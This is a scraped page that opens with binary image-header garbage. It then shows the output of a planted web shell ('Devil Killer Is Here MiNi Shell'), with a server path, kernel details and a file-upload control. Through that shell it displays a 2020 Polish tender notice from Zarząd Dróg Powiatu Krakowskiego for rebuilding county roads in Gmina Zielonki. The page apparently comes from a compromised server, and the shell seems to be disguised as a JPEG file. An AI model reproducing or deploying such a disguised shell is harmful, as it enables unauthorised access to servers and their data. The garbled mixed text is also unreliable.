JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20200909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20200909/583007-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 583007-N-2020 z dnia 2020-09-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zarząd Dróg Powiatu Krakowskiego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">” Przebudowa dróg powiatowych z podziałem na zakresy: Zakres nr 1- „Przebudowa drogi powiatowej nr 2156K od km 0+000,00 do km 3+443,00 w miejscowości Węgrzce, Bosutów, Dziekanowice, Batowice w Gminie Zielonki””. Zakres nr 2 - „Przebudowa drogi powiatowej nr 2293K od km 0+049,00 do 1+412,00 w miejscowości Batowice w Gminie Zielonki.”</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zarząd Dróg Powiatu Krakowskiego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">35157927000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Karola Wojtyły </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">106</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-086</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Batowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">126 221 010, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">sekretariat@zdpk.krakow.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">12-622-10-12</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.zdpk.krakow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka budżetowa samorządu terytorialnego Powiatu Krakowskiego</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://bip.malopolska.pl/zdpkrakowskiego,m,329559,zamowienia-publiczne-o-wartosci-powyzej-30-000-euro.html</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy złożyć osobiście lub przesłać w zamkniętej kopercie.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zarząd Dróg Powiatu Krakowskiego, 32-086 Batowice, ul. Karola Wojtyły 106, pok. 20 (punkt obsługi klienta).</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">” Przebudowa dróg powiatowych z podziałem na zakresy: Zakres nr 1- „Przebudowa drogi powiatowej nr 2156K od km 0+000,00 do km 3+443,00 w miejscowości Węgrzce, Bosutów, Dziekanowice, Batowice w Gminie Zielonki””. Zakres nr 2 - „Przebudowa drogi powiatowej nr 2293K od km 0+049,00 do 1+412,00 w miejscowości Batowice w Gminie Zielonki.”</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.52.20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">2.1.	Przedmiot zamówienia polega na przebudowie drogi powiatowej nr 2156K i 2293K w m. Dziekanowice, Węgrzce, Bosutów, Batowice w ramach zadania p.n. „Przebudowa drogi powiatowej nr 2156K od km 0+000,00 do km 3+443,00 w miejscowości Węgrzce, Bosutów, Dziekanowice, Batowice w Gminie Zielonki” oraz „Przebudowa drogi powiatowej nr 2293K od km 0+049,00 do 1+412,00 w miejscowości Batowice w Gminie Zielonki”.2.2.	Zadanie będzie realizowane na podstawie 2 zgłoszeń do właściwych organów.2.3.	1. Zgłoszenia do Starostwa Powiatowego znak AB.V.6743.3.179.2019.SP z dnia 26.08.2019 r. dla zadania pn.: "Przebudowa drogi powiatowej nr 2156K w Gminie Zielonki od km 0+000 do km 3+442.5 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działkach 756/3, 758, 771, 772 obręb Węgrzce, 505 obręb Bosutów, 128/4, 128/5, 143 obręb Dziekanowice, 3/1 obręb Batowice i przebudowa drogi powiatowej nr 2293K w Gminie Zielonki od km 0+049.01 do 1+412 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działce 3/2 obręb Batowice".2.4.	2. Zgłoszenie do Wojewody Małopolskiego znak WI-XI.7843.1.63.2017.JR z dnia 19.06.2017 r. dla zadania pn.: „Przebudowa drogi powiatowej nr 2156K w Gminie Zielonki od hm:25+81.29 do hm:27+40.73, od hm:28+48.75 do hm: 29+11.27 oraz od hm: 30+23.75 do hm: 34+11.62 w zakresie istniejących nawierzchni jezdni jezdni, budowy ciągu pieszo - rowerowego oraz remontu istniejących skarp i odwodnienia na działkach nr: 290, 296, 294,295,292, 279, 277, 276 obręb Dziekanowice jednostka ewidencyjna Zielonki stanowiące teren zamknięty PKP oraz rozbiórka budynku gospodarczego na działce nr 295 obręb Dziekanowice jednostka ewidencyjna Zielonki służąca rozwojowi infrastruktury drogowej łączącej sieci dróg gminnych Zielonki z siecią TEN-T w ramach poddziałania 7.1.2 Drogi Subregionalne - ZIT, oraz służące podniesieniu dostępności infrastruktury pieszo-rowerowej w Gminie Zielonki”.2.5.	Zakres nr 1 „Przebudowa drogi powiatowej nr 2156K od km 0+000,00 do km 3+443,00 w miejscowości Węgrzce, Bosutów, Dziekanowice, Batowice w Gminie Zielonki” realizowane będzie na podstawie 2 zgłoszeń tj. "Przebudowa drogi powiatowej nr 2156K w Gminie Zielonki od km 0+000 do km 3+442.5 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działkach 756/3, 758, 771, 772 obręb Węgrzce, 505 obręb Bosutów, 128/4, 128/5, 143 obręb Dziekanowice, 3/1 obręb Batowice i przebudowa drogi powiatowej nr 2293K w Gminie Zielonki od km 0+049.01 do 1+412 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działce 3/2 obręb Batowice".2.6.	Zakres nr 2 „Przebudowa drogi powiatowej nr 2293K od km 0+049,00 do 1+412,00 w miejscowości Batowice w Gminie Zielonki” realizowane będzie na podstawie 1 zgłoszenia tj. "Przebudowa drogi powiatowej nr 2156K w Gminie Zielonki od km 0+000 do km 3+442.5 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działkach 756/3, 758, 771, 772 obręb Węgrzce, 505 obręb Bosutów, 128/4, 128/5, 143 obręb Dziekanowice, 3/1 obręb Batowice i przebudowa drogi powiatowej nr 2293K w Gminie Zielonki od km 0+049.01 do 1+412 w zakresie remontu nawierzchni jezdni, przebudowy pobocza na ciąg pieszy oraz remontu istniejących zjazdów, skarp i odwodnienia (wraz z przepustami) w istniejącym pasie drogowym na działce 3/2 obręb Batowice" 2.7.	Szczegółowe wymagania opisujące przedmiot zamówienia określają:•	Szczegółowy opis przedmiotu zamówienia, – stanowiące załącznik nr 8 do SIWZ.•	projekty budowlane, załączniki techniczne i badania – stanowiące załącznik nr 6 do SIWZ.•	specyfikacje techniczne wykonania i odbioru robót budowlanych – stanowiące załącznik nr 7 do SIWZ;•	wzór istotnych postanowień umowy w sprawie zamówienia publicznego stanowiący załącznik nr 4 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111220-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111230-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111250-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111250-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112210-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112700-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112730-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45213310-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45230000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233162-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233294-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232400-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232410-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232411-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233100-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233120-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233123-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233140-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233141-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233142-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233144-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233150-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233160-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233161-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233220-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233221-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233222-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233223-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233250-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233251-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233260-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233261-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233280-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233290-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233292-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233330-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233340-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262300-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262310-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262311-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262510-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262511-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262512-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316213-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45317000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71220000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71240000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71250000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">1.1.	Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których 